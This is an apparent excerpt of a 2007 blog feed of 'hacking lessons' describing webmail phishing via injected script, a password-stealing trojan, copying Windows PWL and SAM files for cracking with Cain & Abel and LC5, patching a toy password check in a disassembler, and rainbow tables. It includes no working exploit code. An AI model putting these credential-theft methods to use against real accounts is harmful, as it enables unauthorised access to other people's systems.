style=""&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;Every time a software is created, the beta version is launched first to check the flaws in it (&lt;b style=""&gt;In Hacking These Flaws Are Called DOORS&lt;/b&gt;). Those which are discovered are closed, but most of the times some doors are left open &lt;b style=""&gt;intentionally&lt;/b&gt; or &lt;b style=""&gt;by mistake&lt;/b&gt;. So a hacker’s job is to find out these doors and exploit it to solve his purpose.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style="color: rgb(51, 51, 255);"&gt;E.g.:&lt;/b&gt; Years ago one open door was found by a hacker in &lt;b style=""&gt;hotmail&lt;/b&gt;. &lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style="color: rgb(51, 51, 255);"&gt;Process:&lt;/b&gt; You write a java script (hardly a 2 - 3 line code) in the message field and send it to your target. When your target opens the message the java script is executed and a page is displayed on the targets computer saying &lt;b style=""&gt;“you have been logged out of hotmail please re enter your password and username” (a proxy site) &lt;/b&gt;once your target enters the required information it is sent back to you. Pretty Simple!!!!!!!!!&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;But this method became so popular that hotmail got hold of it and the door was closed.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Another popular method these days is of a Trojan which is used to hack the password of yahoo messenger. The process is quite similar to above. You install a software on your system known as Magic PS 1.5. This software sends the same message to your target (while you are chatting to him / her) that you have been logged out kindly re-enter your username and password. Once your target enters the required information it is sent back to you. Simple Again!!!!!!!!!&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="color: rgb(51, 51, 255);font-size:130%;" &gt;So are these the only available ways through which you can hack somebody’s password?&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;Nobody can guarantee that some other ways do not exist but ITS CERTAINLY NOT A BRUTE FORCE ATTACK.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;Important: &lt;/span&gt;If somebody says that he knows a way to hack an email password…….please do not send your email address to him/her.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;    &lt;p style="text-align: justify;" class="doctext"&gt;&lt;span style="font-family:Arial;"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-4355904487314141802?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/4355904487314141802/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=4355904487314141802' title='51 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4355904487314141802'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4355904487314141802'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/lesson-one-7th-april-2007.html' title='TRUTH BEHIND EMAIL PASSWORD HACKING (Lesson 7)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>51</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-3890353766742892437</id><published>2007-04-07T14:00:00.000+05:30</published><updated>2007-05-06T21:55:43.617+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Cracking'/><title type='text'>HACKING INTO COMPUTER SYSTEM ON LAN (Lesson 8)</title><content type='html'>&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;For Cracker - &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In this topic we will se that how we can get access to different user accounts on Local Area Network running Windows 98 / Windows XP.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;&lt;br /&gt;Here we will discuss the simplest method to crack password i.e. &lt;b style=""&gt;&lt;span style="color:maroon;"&gt;the software way&lt;/span&gt;&lt;/b&gt;&lt;span style="color:maroon;"&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;&lt;br /&gt;&lt;br /&gt;You need to have the following software’s –&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;1). &lt;b style=""&gt;Caine &amp; Abel&lt;/b&gt; for Windows 98&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;2). &lt;b style=""&gt;LC5&lt;/b&gt; for Windows XP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;How to use these software’s?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;SCENARIO&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - A LAN in which every system (not necessarily) is running on Windows 98.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Now in order to use the LAN features every user must have a Login Username and Password.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Whenever a user creates an account or enters his username and password (for login purpose) the value is stored or compared from a “PWL” file respectively. This file is saved in c:\windows directory and is easily accessible to every user on the LAN. &lt;b style=""&gt;&lt;span style="color:maroon;"&gt;E.g.:&lt;/span&gt;&lt;/b&gt; I am a user and my login name is “crack”, so the format or name of the pwl file will be “crack.pwl”. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;So all you need to do is copy this pwl file on a floppy, cd, pen drive, or any other medium you desire. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Now open this pwl file in Caine &amp; Abel and run the attack (dictionary or brute force). Depending upon the password length the software will take its time to break the code.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Never run this software on a slow machine as it would take weeks to crack a single password. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;In Windows XP the case is little bit difficult. The password is stored in SAM file. There are three copies of SAM file in XP – One in &lt;span style="color:maroon;"&gt;Windows\system32\config&lt;/span&gt;, another in &lt;span style="color:maroon;"&gt;Windows\repair&lt;/span&gt; and the last one is stored in &lt;span style="color:maroon;"&gt;windows registry&lt;/span&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;You will not be able to see or copy these files or values while Windows is running. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify; color: rgb(102, 102, 102);"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 51);font-family:Arial;" &gt;So Boot your system using a bootable disk i.e. in dos mode and copy the file. &lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;Once you have the SAM file open it in LC5 and it will take care of the rest.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Another possible way is – Just install LC5 on the target system and it will tell u all the usernames and password stored in that particular system. But it’s not feasible because LC5 can also take days to crack a single password (depending upon the password length).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;FOR USER –&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;In order to safe guard your account all you need to do is just set a lengthy password containing alphabets, numbers and one special character i.e. @#%^*&amp;amp;(*(). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;span style="font-family:Arial;"&gt;And kindly change your password on a periodic basis.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-3890353766742892437?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/3890353766742892437/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=3890353766742892437' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3890353766742892437'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3890353766742892437'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-into-computer-system-on-lan.html' title='HACKING INTO COMPUTER SYSTEM ON LAN (Lesson 8)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-3719426907484699733</id><published>2007-04-07T13:00:00.000+05:30</published><updated>2007-05-08T18:26:37.429+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Cracking'/><title type='text'>HACKING LESSON 9</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;Creating / Generating Software Keys / Serial Numbers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The main aim of this chapter is to clear some basic concepts of using Disassembler i.e. how a cracker generates the registration key or Serial number of a software.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Below is the C program which perform the following function –&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;1).Prompt for a password&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;2).Display the comparison. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;3).Matches the password character by character.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt; &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;#include stdio.h&lt;stdio.h&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;#include string.h&lt;string.h&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;#define PASSWORD_SIZE 100&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;#define PASSWORD "password\n"&lt;o:p&gt;&lt;/o:p&gt;&lt;/string.h&gt;&lt;/stdio.h&gt;&lt;/span&gt;&lt;/p&gt;                                      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;int main ()&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int count=0;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;char buff [PASSWORD_SIZE];&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;for (;;)&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;printf ("Enter password:");&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;fgets (&amp;buff [0], PASSWORD_SIZE,stdin);&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;if (strcmp (&amp;buff [0], PASSWORD))&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;printf ("Wrong password\n");&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;else break;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;if (++count&gt;3) return -1;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;printf ("Password OK\n");&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;Important:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; This code is not written by me so i cannot guarantee whether it'll work or not.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-3719426907484699733?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/3719426907484699733/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=3719426907484699733' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3719426907484699733'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/3719426907484699733'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-9.html' title='HACKING LESSON 9'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-7321103260946773752</id><published>2007-04-07T12:30:00.000+05:30</published><updated>2007-05-08T18:26:47.989+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Cracking'/><title type='text'>HACKING LESSON 10 - 4th MAY 2007</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;In the last chapter we saw that how a protection mechanism is created, which was demonstrated using a very simple c program which ask user to input a password and if the password matches the correct value it displays a message “Password OK”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Now we will see how to crack that password.&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;Note:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; This chapter only covers the basic i.e. how these things are done; we do not guarantee that it will work on every program. However, the process remains the same.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;What we are trying to do here is called &lt;b style=""&gt;&lt;span style="color:blue;"&gt;Reverse Engineering&lt;/span&gt;&lt;/b&gt;. Though we cannot generate the source code from the executable file but we can have an idea what the source code looks like. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;There are lots of software’s available which can generate the binary code and assembly instructions from the executable file. Therefore, if the reference password is stored in the program itself (like the one which we created) and is not converted to some other form then it can easily be tracked just by looking at the binary code of the file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;SOFTWARE’S&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;&lt;o:p&gt;&lt;span style="text-decoration: none;"&gt;&lt;/span&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;span style="font-family:Arial;"&gt;1). A HEX EDITOR:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; A &lt;span style=""&gt;hex editor&lt;/span&gt; is a &lt;a href="http://en.wikipedia.org/wiki/Computer_program" title="Computer program"&gt;&lt;span style="text-decoration: none; color: rgb(0, 0, 0);"&gt;computer program&lt;/span&gt;&lt;/a&gt; that allows a user to edit compiled programs and binary data-files. Hex editors most often present data in hexadecimal format, because it is easier and also because computers tend to work with 8-bit bytes of information. &lt;span style="color:blue;"&gt;In short, these programs are able to edit the executable files. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;2). A DISASSEMBLER:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; This program can convert the executable file into assembly language. In Short, these programs can help you understand that how a program is working which is necessary to change the way it is working. &lt;b style=""&gt;&lt;span style="color:blue;"&gt;E.g.&lt;/span&gt;&lt;/b&gt; if the program will run only after providing the correct password, then by using a Disassembler its function can be changed to accept every password as the correct password. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;In order to work with a Disassembler a person needs to have a good understanding of all the assembly language instructions such as JMP, PUSH, POP, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;font-size:12;"  &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;Try Hacking Test 4 in order to know how these software’s are used.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-7321103260946773752?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/7321103260946773752/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=7321103260946773752' title='17 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7321103260946773752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7321103260946773752'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-8-28th-april-2007.html' title='HACKING LESSON 10 - 4th MAY 2007'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>17</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-7045142778806138397</id><published>2007-04-07T12:10:00.000+05:30</published><updated>2007-05-13T20:45:45.160+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Cracking'/><title type='text'>HACKING LESSON 11</title><content type='html'>&lt;p&gt;&lt;b&gt;PASSWORD CRACKING USING RAINBOW TABLE&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;In order to work with rainbow tables and rainbow crack we must first understand the following keywords-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;1). LOOKUP TABLE&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – A lookup table&lt;/span&gt;&lt;span style="font-family:Arial;"&gt; is usually an &lt;a href="http://en.wikipedia.org/wiki/Array" title="Array"&gt;&lt;span style="text-decoration: none;color:#000000;" &gt;array&lt;/span&gt;&lt;/a&gt; which is used to replace a runtime operation (in our case – a real time password cracking) with a simpler &lt;b style=""&gt;LOOKUP&lt;/b&gt; operation. This way we can achieve great speed at the cost of memory.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;The idea is to pre-calculate hashes of all possible passwords and store them in a table in the memory. These tables are called Rainbow Tables. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;The pre computation of hashes takes a long time, but once it is done, this type of password cracking is hundreds of time faster than the traditional Brute Force Attack.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;2). SPACE – MEMORY TRADE OFF&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - It is a situation where the &lt;a href="http://en.wikipedia.org/wiki/Computer_storage" title="Computer storage"&gt;&lt;span style="text-decoration: none;color:#000000;" &gt;memory&lt;/span&gt;&lt;/a&gt; use can be reduced at the cost of slower program execution, or vice versa, the computation time can be reduced at the cost of increased memory use&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="color: rgb(51, 102, 255);font-family:Arial;" &gt;A Classic Example&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; - A space-time tradeoff can be applied to the simple problem of data storage. If data is stored uncompressed, it takes more space but less time than if the data were stored compressed (since compressing the data reduces the amount of space it takes, but it takes time to run the &lt;a href="http://en.wikipedia.org/wiki/Compression_algorithm" title="Compression algorithm"&gt;&lt;span style="text-decoration: none;color:#000000;" &gt;compression algorithm&lt;/span&gt;&lt;/a&gt;). Depending on the particular instance of the problem, either way is practical.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="color: rgb(51, 102, 255);font-family:Arial;" &gt;How to generate a Rainbow Table?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Search for a program called rainbow crack&lt;/span&gt;.&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;Warning: &lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;Rainbow tables are very large, can take GB’s of system space.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;Definition of Rainbow Crack&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; – Rainbow Crack tool is a hash cracker. A traditional brute force cracker tries all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-7045142778806138397?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/7045142778806138397/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=7045142778806138397' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7045142778806138397'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7045142778806138397'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-11.html' title='HACKING LESSON 11'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 